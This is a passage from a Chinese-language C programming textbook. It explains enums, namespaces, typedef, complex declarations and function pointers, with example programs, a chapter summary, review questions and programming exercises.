那么,cat的值是0(默认),lynx、puma和tiger的值分别是10、11、 12。 14.11.4 enum的用法 枚举类型的目的是为了提高程序的可读性和可维护性。如果要处理颜 色,使用red和blue比使用0和1更直观。注意,枚举类型只能在内部使用。如 果要输入color中orange的值,只能输入1,而不是单词orange。或者,让程序 先读入字符串"orange",再将其转换为orange代表的值。 因为枚举类型是整数类型,所以可以在表达式中以使用整数变量的方式 使用enum变量。它们用在case语句中很方便。 程序清单14.15演示了一个使用enum的小程序。该程序示例使用默认值 的方案,把red的值设置为0,使之成为指向字符串"red"的指针的索引。 程序清单14.15 enum.c程序 /* enum.c -- 使用枚举类型的值 */ #include <stdio.h> #include <string.h>  // 提供 strcmp()、strchr()函数的原型 #include <stdbool.h>  // C99 特性 char * s_gets(char * st, int n); enum spectrum { red, orange, yellow, green, blue, violet }; const char * colors [] = { "red", "orange", "yellow", 1093 "green", "blue", "violet" }; #define LEN 30 int main(void) { char choice[LEN]; enum spectrum color; bool color_is_found = false; puts("Enter a color (empty line to quit):"); while (s_gets(choice, LEN) != NULL && choice[0] != '\0') { for (color = red; color <= violet; color++) { if (strcmp(choice, colors[color]) == 0) { color_is_found = true; break; } } if (color_is_found) 1094 switch (color) { case red: puts("Roses are red."); break; case orange: puts("Poppies are orange."); break; case yellow: puts("Sunflowers are yellow."); break; case green: puts("Grass is green."); break; case blue: puts("Bluebells are blue."); break; case violet: puts("Violets are violet."); break; } else printf("I don't know about the color %s.\n", choice); color_is_found = false; puts("Next color, please (empty line to quit):"); 1095 } puts("Goodbye!"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 清理输入行 } return ret_val; 1096 } 当输入的字符串与color数组的成员指向的字符串相匹配时,for循环结 束。如果循环找到匹配的颜色,程序就用枚举变量的值与作为case标签的枚 举常量匹配。下面是该程序的一个运行示例: Enter a color (empty line to quit): blue Bluebells are blue. Next color, please (empty line to quit): orange Poppies are orange. Next color, please (empty line to quit): purple I don't know about the color purple. Next color, please (empty line to quit): Goodbye! 
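在进入下一节之前,再补充一个简短的示意(非原书程序清单),演示前面提到的"只要是能使用整型常量的地方就可以使用枚举常量",例如用枚举常量指定数组大小并作为下标。其中额外添加的枚举符 COLORS 是为演示而假设的,其值恰好等于颜色的数量:
/* enumidx.c -- 示意:把枚举常量用作数组大小和下标 */
#include <stdio.h>
enum spectrum { red, orange, yellow, green, blue, violet, COLORS };
int main(void)
{
    int votes[COLORS] = { 0 };   /* COLORS 的值是 6,可用作数组大小 */
    enum spectrum color;
    votes[blue] += 3;            /* 枚举常量可用作数组下标 */
    votes[red] += 1;
    for (color = red; color < COLORS; color++)
        printf("color %d: %d votes\n", color, votes[color]);
    return 0;
}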
14.11.5 共享名称空间 C语言使用名称空间(namespace)标识程序中的各部分,即通过名称来 识别。作用域是名称空间概念的一部分:两个不同作用域的同名变量不冲 突;两个相同作用域的同名变量冲突。名称空间是分类别的。在特定作用域 中的结构标记、联合标记和枚举标记都共享相同的名称空间,该名称空间与 普通变量使用的空间不同。这意味着在相同作用域中变量和标记的名称可以 相同,不会引起冲突,但是不能在相同作用域中声明两个同名标签或同名变 1097 量。例如,在C中,下面的代码不会产生冲突: struct rect { double x; double y; }; int rect; // 在C中不会产生冲突 尽管如此,以两种不同的方式使用相同的标识符会造成混乱。另外, C++不允许这样做,因为它把标记名和变量名放在相同的名称空间中。 1098 14.12 typedef简介 typedef工具是一个高级数据特性,利用typedef可以为某一类型自定义名 称。这方面与#define类似,但是两者有3处不同: 与#define不同,typedef创建的符号名只受限于类型,不能用于值。 typedef由编译器解释,不是预处理器。 在其受限范围内,typedef比#define更灵活。 下面介绍typedef的工作原理。假设要用BYTE表示1字节的数组。只需像 定义个char类型变量一样定义BYTE,然后在定义前面加上关键字typedef即 可: typedef unsigned char BYTE; 随后,便可使用BYTE来定义变量: BYTE x, y[10], * z; 该定义的作用域取决于typedef定义所在的位置。如果定义在函数中,就 具有局部作用域,受限于定义所在的函数。如果定义在函数外面,就具有文 件作用域。 通常,typedef定义中用大写字母表示被定义的名称,以提醒用户这个类 型名实际上是一个符号缩写。当然,也可以用小写: typedef unsigned char byte; typedef中使用的名称遵循变量的命名规则。 为现有类型创建一个名称,看上去真是多此一举,但是它有时的确很有 用。在前面的示例中,用BYTE代替unsigned char表明你打算用BYTE类型的 变量表示数字,而不是字符码。使用typedef还能提高程序的可移植性。例 1099 如,我们之前提到的sizeof运算符的返回类型:size_t类型,以及time()函数 的返回类型:time_t类型。C标准规定sizeof和time()返回整数类型,但是让实 现来决定具体是什么整数类型。其原因是,C 标准委员会认为没有哪个类型 对于所有的计算机平台都是最优选择。所以,标准委员会决定建立一个新的 类型名(如,time_t),并让实现使用typedef来设置它的具体类型。以这样 的方式,C标准提供以下通用原型: time_t time(time_t *); time_t 在一个系统中是 unsigned long,在另一个系统中可以是 unsigned long long。只要包含time.h头文件,程序就能访问合适的定义,你也可以在 代码中声明time_t类型的变量。 typedef的一些特性与#define的功能重合。例如: #define BYTE unsigned char 这使预处理器用BYTE替换unsigned char。但是也有#define没有的功能: typedef char * STRING; 没有typedef关键字,编译器将把STRING识别为一个指向char的指针变 量。有了typedef关键字,编译器则把STRING解释成一个类型的标识符,该 类型是指向char的指针。因此: STRING name, sign; 相当于: char * name, * sign; 但是,如果这样假设: #define STRING char * 1100 然后,下面的声明: STRING name, sign; 将被翻译成: char * name, sign; 这导致只有name才是指针。 还可以把typedef用于结构: typedef struct complex { float real; float imag; } COMPLEX; 然后便可使用COMPLEX类型代替complex结构来表示复数。使用typedef 的第1个原因是:为经常出现的类型创建一个方便、易识别的类型名。例 如,前面的例子中,许多人更倾向于使用 STRING 或与其等价的标记。 用typedef来命名一个结构类型时,可以省略该结构的标签: typedef struct {double x; double y;} rect; 假设这样使用typedef定义的类型名: rect r1 = {3.0, 6.0}; rect r2; 以上代码将被翻译成: struct {double x; double y;} r1= {3.0, 6.0}; 1101 struct {double x; double y;} r2; r2 = r1; 这两个结构在声明时都没有标记,它们的成员完全相同(成员名及其类 型都匹配),C认为这两个结构的类型相同,所以r1和r2间的赋值是有效操 作。 使用typedef的第2个原因是:typedef常用于给复杂的类型命名。例如, 下面的声明: typedef char (* FRPTC ()) [5]; 把FRPTC声明为一个函数类型,该函数返回一个指针,该指针指向内含 5个char类型元素的数组(参见下一节的讨论)。 使用typedef时要记住,typedef并没有创建任何新类型,它只是为某个已 存在的类型增加了一个方便使用的标签。以前面的STRING为例,这意味着 我们创建的STRING类型变量可以作为实参传递给以指向char指针作为形参 的函数。 通过结构、联合和typedef,C提供了有效处理数据的工具和处理可移植 数据的工具。 1102 14.13 其他复杂的声明 C 允许用户自定义数据形式。虽然我们常用的是一些简单的形式,但是 根据需要有时还会用到一些复杂的形式。在一些复杂的声明中,常包含下面 的符号,如表14.1所示: 表14.1 声明时可使用的符号 下面是一些较复杂的声明示例: int board[8][8];    // 声明一个内含int数组的数组 int ** ptr;      // 声明一个指向指针的指针,被指向的指针指向int int * risks[10];   // 声明一个内含10个元素的数组,每个元素都是一 个指向int的指针 int (* rusks)[10];  // 声明一个指向数组的指针,该数组内含10个int类 型的值 int * oof[3][4];   // 声明一个3×4 的二维数组,每个元素都是指向int 的指针 int (* uuf)[3][4];  // 声明一个指向3×4二维数组的指针,该数组中内含 int类型值 int (* uof[3])[4];  // 声明一个内含3个指针元素的数组,其中每个指针 都指向一个内含4个int类型元素的数组 要看懂以上声明,关键要理解*、()和[]的优先级。记住下面几条规则。 1103 1.数组名后面的[]和函数名后面的()具有相同的优先级。它们比*(解引 用运算符)的优先级高。因此下面声明的risk是一个指针数组,不是指向数 组的指针: int * risks[10]; 2.[]和()的优先级相同,由于都是从左往右结合,所以下面的声明中, 在应用方括号之前,*先与rusks结合。因此rusks是一个指向数组的指针,该 数组内含10个int类型的元素: int (* rusks)[10]; 3.[]和()都是从左往右结合。因此下面声明的goods是一个由12个内含50 个int类型值的数组组成的二维数组,不是一个有50个内含12个int类型值的数 组组成的二维数组: int goods[12][50]; 把以上规则应用于下面的声明: int * oof[3][4]; [3]比*的优先级高,由于从左往右结合,所以[3]先与oof结合。因此, oof首先是一个内含3个元素的数组。然后再与[4]结合,所以oof的每个元素 都是内含4个元素的数组。*说明这些元素都是指针。最后,int表明了这4个 元素都是指向int的指针。因此,这条声明要表达的是:foo是一个内含3个元 
素的数组,其中每个元素是由4个指向int的指针组成的数组。简而言之,oof 是一个3×4的二维数组,每个元素都是指向int的指针。编译器要为12个指针 预留存储空间。 现在来看下面的声明: int (* uuf)[3][4]; 圆括号使得*先与uuf结合,说明uuf是一个指针,所以uuf是一个指向3×4 1104 的int类型二维数组的指针。编译器要为一个指针预留存储空间。 根据这些规则,还可以声明: char * fump(int);     // 返回字符指针的函数 char (* frump)(int);   // 指向函数的指针,该函数的返回类型为char char (* flump[3])(int);  // 内含3个指针的数组,每个指针都指向返回 类型为char的函数 这3个函数都接受int类型的参数。 可以使用typedef建立一系列相关类型: typedef int arr5[5]; typedef arr5 * p_arr5; typedef p_arr5 arrp10[10]; arr5 togs;  // togs 是一个内含5个int类型值的数组 p_arr5 p2;  // p2 是一个指向数组的指针,该数组内含5个int类型的值 arrp10 ap;  // ap 是一个内含10个指针的数组,每个指针都指向一个 内含5个int类型值的数组 如果把这些放入结构中,声明会更复杂。至于应用,我们就不再进一步 讨论了。 1105 14.14 函数和指针 通过上一节的学习可知,可以声明一个指向函数的指针。这个复杂的玩 意儿到底有何用处?通常,函数指针常用作另一个函数的参数,告诉该函数 要使用哪一个函数。例如,排序数组涉及比较两个元素,以确定先后。如果 元素是数字,可以使用>运算符;如果元素是字符串或结构,就要调用函数 进行比较。C库中的 qsort()函数可以处理任意类型的数组,但是要告诉 qsort()使用哪个函数来比较元素。为此, qsort()函数的参数列表中,有一个 参数接受指向函数的指针。然后,qsort()函数使用该函数提供的方案进行排 序,无论这个数组中的元素是整数、字符串还是结构。 我们来进一步研究函数指针。首先,什么是函数指针?假设有一个指向 int类型变量的指针,该指针储存着这个int类型变量储存在内存位置的地址。 同样,函数也有地址,因为函数的机器语言实现由载入内存的代码组成。指 向函数的指针中储存着函数代码的起始处的地址。 其次,声明一个数据指针时,必须声明指针所指向的数据类型。声明一 个函数指针时,必须声明指针指向的函数类型。为了指明函数类型,要指明 函数签名,即函数的返回类型和形参类型。例如,考虑下面的函数原型: void ToUpper(char *); // 把字符串中的字符转换成大写字符 ToUpper()函数的类型是“带char * 类型参数、返回类型是void的函数”。 下面声明了一个指针pf指向该函数类型: void (*pf)(char *);  // pf 是一个指向函数的指针 从该声明可以看出,第1对圆括号把*和pf括起来,表明pf是一个指向函 数的指针。因此,(*pf)是一个参数列表为(char *)、返回类型为void的函数。 注意,把函数名ToUpper替换为表达式(*pf)是创建指向函数指针最简单的方 式。所以,如果想声明一个指向某类型函数的指针,可以写出该函数的原型 后把函数名替换成(*pf)形式的表达式,创建函数指针声明。前面提到过,由 于运算符优先级的规则,在声明函数指针时必须把*和指针名括起来。如果 1106 省略第1个圆括号会导致完全不同的情况: void *pf(char *); // pf 是一个返回字符指针的函数 提示 要声明一个指向特定类型函数的指针,可以先声明一个该类型的函数, 然后把函数名替换成(*pf)形式的表达式。然后,pf就成为指向该类型函数的 指针。 声明了函数指针后,可以把类型匹配的函数地址赋给它。在这种上下文 中,函数名可以用于表示函数的地址: void ToUpper(char *); void ToLower(char *); int round(double); void (*pf)(char *); pf = ToUpper;   // 有效,ToUpper是该类型函数的地址 pf = ToLower;   //有效,ToUpper是该类型函数的地址 pf = round;    // 无效,round与指针类型不匹配 pf = ToLower();  // 无效,ToLower()不是地址 最后一条语句是无效的,不仅因为 ToLower()不是地址,而且 ToLower()的返回类型是 void,它没有返回值,不能在赋值语句中进行赋 值。注意,指针pf可以指向其他带char *类型参数、返回类型是void的函数, 不能指向其他类型的函数。 既然可以用数据指针访问数据,也可以用函数指针访问函数。奇怪的 是,有两种逻辑上不一致的语法可以这样做,下面解释: 1107 void ToUpper(char *); void ToLower(char *); void (*pf)(char *); char mis[] = "Nina Metier"; pf = ToUpper; (*pf)(mis);  // 把ToUpper 作用于(语法1) pf = ToLower; pf(mis);   // 把ToLower 作用于(语法2) 这两种方法看上去都合情合理。先分析第1种方法:由于pf指向ToUpper 函数,那么*pf就相当于ToUpper函数,所以表达式(*pf)(mis)和ToUpper(mis) 相同。从ToUpper函数和pf的声明就能看出,ToUpper和(*pf)是等价的。第2 种方法:由于函数名是指针,那么指针和函数名可以互换使用,所以pf(mis) 和ToUpper(mis)相同。从pf的赋值表达式语句就能看出ToUpper和pf是等价 的。由于历史的原因,贝尔实验室的C和UNIX的开发者采用第1种形式,而 伯克利的UNIX推广者却采用第2种形式。K&R C不允许第2种形式。但是, 为了与现有代码兼容,ANSI C认为这两种形式(本例中是(*pf)(mis)和 pf(mis))等价。后续的标准也延续了这种矛盾的和谐。 作为函数的参数是数据指针最常见的用法之一,函数指针亦如此。例 如,考虑下面的函数原型: void show(void (* fp)(char *), char * str); 这看上去让人头晕。它声明了两个形参:fp和str。fp形参是一个函数指 针,str是一个数据指针。更具体地说,fp指向的函数接受char * 类型的参 数,其返回类型为void;str指向一个char类型的值。因此,假设有上面的声 明,可以这样调用函数: 1108 show(ToLower, mis);  /* show()使用ToLower()函数:fp = ToLower */ show(pf, mis);    /* show()使用pf指向的函数: fp = pf */ show()如何使用传入的函数指针?是用fp()语法还是(*fp)()语法调用函 数: void show(void (* fp)(char *), char * str) { (*fp)(str); /* 把所选函数作用于str */ puts(str);    /* 显示结果 */ } 例如,这里的show()首先用fp指向的函数转换str,然后显示转换后的字 符串。 顺带一提,把带返回值的函数作为参数传递给另一个函数有两种不同的 方法。例如,考虑下面的语句: function1(sqrt);   /* 传递sqrt()函数的地址 */ function2(sqrt(4.0)); /* 传递sqrt()函数的返回值 */ 第1条语句传递的是sqrt()函数的地址,假设function1()在其代码中会使 用该函数。第2条语句先调用sqrt()函数,然后求值,并把返回值(该例中是 2.0)传递给function2()。 程序清单14.16中的程序通过show()函数来演示这些要点,该函数以各 种转换函数作为参数。该程序也演示了一些处理菜单的有用技巧。 程序清单14.16 func_ptr.c程序 1109 // func_ptr.c -- 使用函数指针 #include 
<stdio.h> #include <string.h> #include <ctype.h> #define LEN 81 char * s_gets(char * st, int n); char showmenu(void); void eatline(void);    // 读取至行末尾 void show(void(*fp)(char *), char * str); void ToUpper(char *);   // 把字符串转换为大写 void ToLower(char *);   // 把字符串转换为小写 void Transpose(char *);  // 大小写转置 void Dummy(char *);    // 不更改字符串 int main(void) { char line[LEN]; char copy[LEN]; char choice; void(*pfun)(char *); // 声明一个函数指针,被指向的函数接受char *类型 1110 的参数,无返回值 puts("Enter a string (empty line to quit):"); while (s_gets(line, LEN) != NULL && line[0] != '\0') { while ((choice = showmenu()) != 'n') { switch (choice) // switch语句设置指针 { case 'u': pfun = ToUpper;  break; case 'l': pfun = ToLower;  break; case 't': pfun = Transpose; break; case 'o': pfun = Dummy;  break; } strcpy(copy, line);  // 为show()函数拷贝一份 show(pfun, copy);   // 根据用户的选择,使用选定的函数 } puts("Enter a string (empty line to quit):"); } puts("Bye!"); 1111 return 0; } char showmenu(void) { char ans; puts("Enter menu choice:"); puts("u) uppercase   l) lowercase"); puts("t) transposed case o) original case"); puts("n) next string"); ans = getchar();    // 获取用户的输入 ans = tolower(ans);  // 转换为小写 eatline();       // 清理输入行 while (strchr("ulton", ans) == NULL) { puts("Please enter a u, l, t, o, or n:"); ans = tolower(getchar()); eatline(); } return ans; 1112 } void eatline(void) { while (getchar() != '\n') continue; } void ToUpper(char * str) { while (*str) { *str = toupper(*str); str++; } } void ToLower(char * str) { while (*str) { *str = tolower(*str); 1113 str++; } } void Transpose(char * str) { while (*str) { if (islower(*str)) *str = toupper(*str); else if (isupper(*str)) *str = tolower(*str); str++; } } void Dummy(char * str) { // 不改变字符串 } void show(void(*fp)(char *), char * str) 1114 { (*fp)(str);  // 把用户选定的函数作用于str puts(str);  // 显示结果 } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 清理输入行中剩余的字符 } return ret_val; 1115 } 下面是该程序的输出示例: Enter a string (empty line to quit): Does C make you feel loopy? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case n) next string t dOES c MAKE YOU FEEL LOOPY? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case n) next string l does c make you feel loopy? Enter menu choice: u) uppercase l) lowercase t) transposed case o) original case 1116 n) next string n Enter a string (empty line to quit): Bye! 
注意,ToUpper()、ToLower()、Transpose()和 Dummy()函数的类型都相 同,所以这 4 个函数都可以赋给pfun指针。该程序把pfun作为show()的参 数,但是也可以直接把这4个函数中的任一个函数名作为参数,如 show(Transpose, copy)。 这种情况下,可以使用typedef。例如,该程序中可以这样写: typedef void (*V_FP_CHARP)(char *); void show (V_FP_CHARP fp, char *); V_FP_CHARP pfun; 如果还想更复杂一些,可以声明并初始化一个函数指针的数组: V_FP_CHARP arpf[4] = {ToUpper, ToLower, Transpose, Dummy}; 然后把showmenu()函数的返回类型改为int,如果用户输入u,则返回0; 如果用户输入l,则返回2;如果用户输入t,则返回2,以此类推。可以把程 序中的switch语句替换成下面的while循环: index = showmenu(); while (index >= 0 && index <= 3) { strcpy(copy, line);    /* 为show()拷贝一份 */ 1117 show(arpf[index], copy);  /* 使用选定的函数 */ index = showmenu(); } 虽然没有函数数组,但是可以有函数指针数组。 以上介绍了使用函数名的4种方法:定义函数、声明函数、调用函数和 作为指针。图14.4进行了总结。 图14.4 函数名的用法 至于如何处理菜单,showmenu()函数给出了几种技巧。首先,下面的代 码: ans = getchar();    // 获取用户输入 ans = tolower(ans);  // 转换成小写 和 ans = tolower(getchar()); 演示了转换用户输入的两种方法。这两种方法都可以把用户输入的字符 转换为一种大小写形式,这样就不用检测用户输入的是'u'还是'U',等等。 eatline()函数丢弃输入行中的剩余字符,在处理这两种情况时很有用。 第一,用户为了输入一个选择,输入一个字符,然后按下Enter键,将产生 一个换行符。如果不处理这个换行符,它将成为下一次读取的第1个字符。 1118 第二,假设用户输入的是整个单词uppercase,而不是一个字母u。如果 没有 eatline()函数,程序会把uppercase中的字符作为用户的响应依次读取。有了 eatline(),程序会读取u字符并丢弃输入行中剩余的字符。 其次,showmenu()函数的设计意图是,只给程序返回正确的选项。为完 成这项任务,程序使用了string.h头文件中的标准库函数strchr(): while (strchr("ulton", ans) == NULL) 该函数在字符串"ulton"中查找字符ans首次出现的位置,并返回一个指 向该字符的指针。如果没有找到该字符,则返回空指针。因此,上面的 while循环头可以用下面的while循环头代替,但是上面的用起来更方便: while (ans != 'u' && ans != 'l' && ans != 't' && ans != 'o' && ans != 'n') 待检查的项越多,使用strchr()就越方便。 1119 14.15 关键概念 我们在编程中要表示的信息通常不只是一个数字或一些列数字。程序可 能要处理具有多种属性的实体。例如,通过姓名、地址、电话号码和其他信 息表示一名客户;或者,通过电影名、发行人、播放时长、售价等表示一部 电影DVD。C结构可以把这些信息都放在一个单元内。在组织程序时这很重 要,因为这样可以把相关的信息都储存在一处,而不是分散储存在多个变量 中。 设计结构时,开发一个与之配套的函数包通常很有用。例如,写一个以 结构(或结构的地址)为参数的函数打印结构内容,比用一堆printf()语句强 得多。因为只需要一个参数就能打印结构中的所有信息。如果把信息放到零 散的变量中,每个部分都需要一个参数。另外,如果要在结构中增加一个成 员,只需重写函数,不必改写函数调用。这在修改结构时很方便。 联合声明与结构声明类似。但是,联合的成员共享相同的存储空间,而 且在联合中同一时间内只能有一个成员。实质上,可以在联合变量中储存一 个类型不唯一的值。 enum 工具提供一种定义符号常量的方法,typedef 工具提供一种为基本 或派生类型创建新标识符的方法。 指向函数的指针提供一种告诉函数应使用哪一个函数的方法。 1120 14.16 本章小结 C 结构提供在相同的数据对象中储存多个不同类型数据项的方法。可以 使用标记来标识一个具体的结构模板,并声明该类型的变量。通过成员点运 算符(.)可以使用结构模版中的标签来访问结构的各个成员。 如果有一个指向结构的指针,可以用该指针和间接成员运算符(->)代 替结构名和点运算符来访问结构的各成员。和数组不同,结构名不是结构的 地址,要在结构名前使用&运算符才能获得结构的地址。 一贯以来,与结构相关的函数都使用指向结构的指针作为参数。现在的 C允许把结构作为参数传递,作为返回值和同类型结构之间赋值。然而,传 递结构的地址通常更有效。 联合使用与结构相同的语法。然而,联合的成员共享一个共同的存储空 间。联合同一时间内只能储存一个单独的数据项,不像结构那样同时储存多 种数据类型。也就是说,结构可以同时储存一个int类型数据、一个double类 型数据和一个char类型数据,而相应的联合只能保存一个int类型数据,或者 一个double类型数据,或者一个char类型数据。 通过枚举可以创建一系列代表整型常量(枚举常量)的符号和定义相关 联的枚举类型。 typedef工具可用于建立C标准类型的别名或缩写。 函数名代表函数的地址,可以把函数的地址作为参数传递给其他函数, 然后这些函数就可以使用被指向的函数。如果把特定函数的地址赋给一个名 为pf的函数指针,可以通过以下两种方式调用该函数: #include <math.h> /* 提供sin()函数的原型:double sin(double) */ ... double (*pdf)(double); 1121 double x; pdf = sin; x = (*pdf)(1.2); // 调用sin(1.2) x = pdf(1.2);   // 同样调用 sin(1.2) 1122 14.17 复习题 复习题的参考答案在附录A中。 1.下面的结构模板有什么问题: structure { char itable; int num[20]; char * togs } 2.下面是程序的一部分,输出是什么? 
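作为补充,下面给出一个简短的示意(非原书程序清单),演示本节开头提到的标准库函数 qsort() 如何通过函数指针参数接收比较函数(qsort() 的详细用法在后面的章节介绍,这里只示意把函数地址作为参数传递):
/* qsort_demo.c -- 示意:把比较函数的地址传给 qsort() */
#include <stdio.h>
#include <stdlib.h>    /* 提供 qsort() 的原型 */
int compare_ints(const void * a, const void * b)
{
    const int * pa = (const int *) a;
    const int * pb = (const int *) b;
    if (*pa < *pb) return -1;
    else if (*pa > *pb) return 1;
    else return 0;
}
int main(void)
{
    int vals[5] = { 40, 10, 30, 50, 20 };
    int i;
    qsort(vals, 5, sizeof(int), compare_ints);  /* 第4个参数是比较函数的地址 */
    for (i = 0; i < 5; i++)
        printf("%d ", vals[i]);
    putchar('\n');
    return 0;
}
与 show() 接收 pfun 的道理相同,传给 qsort() 的比较函数必须与其原型中声明的函数指针类型一致。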
#include <stdio.h> struct house { float sqft; int rooms; int stories; char address[40]; }; int main(void) { struct house fruzt = {1560.0, 6, 1, "22 Spiffo Road"}; 1123 struct house *sign; sign = &fruzt; printf("%d %d\n", fruzt.rooms, sign->stories); printf("%s \n", fruzt.address); printf("%c %c\n", sign->address[3], fruzt.address[4]); return 0; } 3.设计一个结构模板储存一个月份名、该月份名的3个字母缩写、该月 的天数以及月份号。 4.定义一个数组,内含12个结构(第3题的结构类型)并初始化为一个 年份(非闰年)。 5.编写一个函数,用户提供月份号,该函数就返回一年中到该月为止 (包括该月)的总天数。假设在所有函数的外部声明了第3题的结构模版和 一个该类型结构的数组。 6.a.假设有下面的 typedef,声明一个内含 10 个指定结构的数组。然 后,单独给成员赋值(或等价字符串),使第3个元素表示一个焦距长度有 500mm,孔径为f/2.0的Remarkata镜头。 typedef struct lens {  /* 描述镜头      */ float foclen;   /* 焦距长度,单位为mm  */ float fstop;    /* 孔径       */ char brand[30];  /* 品牌名称      */ 1124 } LENS; b.重写a,在声明中使用一个待指定初始化器的初始化列表,而不是对 每个成员单独赋值。 7.考虑下面程序片段: struct name { char first[20]; char last[20]; }; struct bem { int limbs; struct name title; char type[30]; }; struct bem * pb; struct bem deb = { 6, { "Berbnazel", "Gwolkapwolk" }, "Arcturan" }; 1125 pb = &deb; a.下面的语句分别打印什么? printf("%d\n", deb.limbs); printf("%s\n", pb->type); printf("%s\n", pb->type + 2); b.如何用结构表示法(两种方法)表示"Gwolkapwolk"? c.编写一个函数,以bem结构的地址作为参数,并以下面的形式输出结 构的内容(假定结构模板在一个名为starfolk.h的头文件中): Berbnazel Gwolkapwolk is a 6-limbed Arcturan. 8.考虑下面的声明: struct fullname { char fname[20]; char lname[20]; }; struct bard { struct fullname name; int born; int died; }; 1126 struct bard willie; struct bard *pt = &willie; a.用willie标识符标识willie结构的born成员。 b.用pt标识符标识willie结构的born成员。 c.调用scanf()读入一个用willie标识符标识的born成员的值。 d.调用scanf()读入一个用pt标识符标识的born成员的值。 e.调用scanf()读入一个用willie标识符标识的name成员中lname成员的 值。 f.调用scanf()读入一个用pt标识符标识的name成员中lname成员的值。 g.构造一个标识符,标识willie结构变量所表示的姓名中名的第3个字母 (英文的名在前)。 h.构造一个表达式,表示willie结构变量所表示的名和姓中的字母总 数。 9.定义一个结构模板以储存这些项:汽车名、马力、EPA(美国环保 局)城市交通MPG(每加仑燃料行驶的英里数)评级、轴距和出厂年份。 使用car作为该模版的标记。 10.假设有如下结构: struct gas { float distance; float gals; float mpg; 1127 }; a.设计一个函数,接受struct gas类型的参数。假设传入的结构包含 distance和gals信息。该函数为mpg成员计算正确的值,并把值返回该结构。 b.设计一个函数,接受struct gas类型的参数。假设传入的结构包含 distance和gals信息。该函数为mpg成员计算正确的值,并把该值赋给合适的 成员。 11.声明一个标记为choices的枚举,把枚举常量no、yes和maybe分别设置 为0、1、2。 12.声明一个指向函数的指针,该函数返回指向char的指针,接受一个指 向char的指针和一个char类型的值。 13.声明4个函数,并初始化一个指向这些函数的指针数组。每个函数都 接受两个double类型的参数,返回double类型的值。另外,用两种方法使用 该数组调用带10.0和2.5实参的第2个函数。 1128 14.18 编程练习 1.重新编写复习题 5,用月份名的拼写代替月份号(别忘了使用 strcmp())。在一个简单的程序中测试该函数。 2.编写一个函数,提示用户输入日、月和年。月份可以是月份号、月份 名或月份名缩写。然后该程序应返回一年中到用户指定日子(包括这一天) 的总天数。 3.修改程序清单 14.2 中的图书目录程序,使其按照输入图书的顺序输出 图书的信息,然后按照标题字母的声明输出图书的信息,最后按照价格的升 序输出图书的信息。 4.编写一个程序,创建一个有两个成员的结构模板: a.第1个成员是社会保险号,第2个成员是一个有3个成员的结构,第1个 成员代表名,第2个成员代表中间名,第3个成员表示姓。创建并初始化一个 内含5个该类型结构的数组。该程序以下面的格式打印数据: Dribble, Flossie M.–– 302039823 如果有中间名,只打印它的第1个字母,后面加一个点(.);如果没有 中间名,则不用打印点。编写一个程序进行打印,把结构数组传递给这个函 数。 b.修改a部分,传递结构的值而不是结构的地址。 5.编写一个程序满足下面的要求。 a.外部定义一个有两个成员的结构模板name:一个字符串储存名,一个 字符串储存姓。 b.外部定义一个有3个成员的结构模板student:一个name类型的结构, 一个grade数组储存3个浮点型分数,一个变量储存3个分数平均数。 1129 c.在main()函数中声明一个内含CSIZE(CSIZE = 4)个student类型结构的 数组,并初始化这些结构的名字部分。用函数执行g、e、f和g中描述的任 务。 d.以交互的方式获取每个学生的成绩,提示用户输入学生的姓名和分 数。把分数储存到grade数组相应的结构中。可以在main()函数或其他函数中 用循环来完成。 e.计算每个结构的平均分,并把计算后的值赋给合适的成员。 f.打印每个结构的信息。 g.打印班级的平均分,即所有结构的数值成员的平均值。 6.一个文本文件中保存着一个垒球队的信息。每行数据都是这样排列: 4 Jessie Joybat 5 2 1 1 第1项是球员号,为方便起见,其范围是0~18。第2项是球员的名。第3 项是球员的姓。名和姓都是一个单词。第4项是官方统计的球员上场次数。 接着3项分别是击中数、走垒数和打点(RBI)。文件可能包含多场比赛的 数据,所以同一位球员可能有多行数据,而且同一位球员的多行数据之间可 能有其他球员的数据。编写一个程序,把数据储存到一个结构数组中。该结 构中的成员要分别表示球员的名、姓、上场次数、击中数、走垒数、打点和 安打率(稍后计算)。可以使用球员号作为数组的索引。该程序要读到文件 结尾,并统计每位球员的各项累计总和。 世界棒球统计与之相关。例如,一次走垒和触垒中的失误不计入上场次 数,但是可能产生一个RBI。但是该程序要做的是像下面描述的一样读取和 处理数据文件,不会关心数据的实际含义。 
要实现这些功能,最简单的方法是把结构的内容都初始化为零,把文件 中的数据读入临时变量中,然后将其加入相应的结构中。程序读完文件后, 应计算每位球员的安打率,并把计算结果储存到结构的相应成员中。计算安 1130 打率是用球员的累计击中数除以上场累计次数。这是一个浮点数计算。最 后,程序结合整个球队的统计数据,一行显示一位球员的累计数据。 7.修改程序清单 14.14,从文件中读取每条记录并显示出来,允许用户 删除记录或修改记录的内容。如果删除记录,把空出来的空间留给下一个要 读入的记录。要修改现有的文件内容,必须用"r+b"模式,而不是"a+b"模 式。而且,必须更加注意定位文件指针,防止新加入的记录覆盖现有记录。 最简单的方法是改动储存在内存中的所有数据,然后再把最后的信息写入文 件。跟踪的一个方法是在book结构中添加一个成员表示是否该项被删除。 8.巨人航空公司的机群由 12 个座位的飞机组成。它每天飞行一个航 班。根据下面的要求,编写一个座位预订程序。 a.该程序使用一个内含 12 个结构的数组。每个结构中包括:一个成员 表示座位编号、一个成员表示座位是否已被预订、一个成员表示预订人的 名、一个成员表示预订人的姓。 b.该程序显示下面的菜单: To choose a function, enter its letter label: a) Show number of empty seats b) Show list of empty seats c) Show alphabetical list of seats d) Assign a customer to a seat assignment e) Delete a seat assignment f) Quit c.该程序能成功执行上面给出的菜单。选择d)和e)要提示用户进行额外 输入,每个选项都能让用户中止输入。 1131 d.执行特定程序后,该程序再次显示菜单,除非用户选择f)。 9.巨人航空公司(编程练习 8)需要另一架飞机(容量相同),每天飞 4 班(航班 102、311、444 和519)。把程序扩展为可以处理4个航班。用一 个顶层菜单提供航班选择和退出。选择一个特定航班,就会出现和编程练习 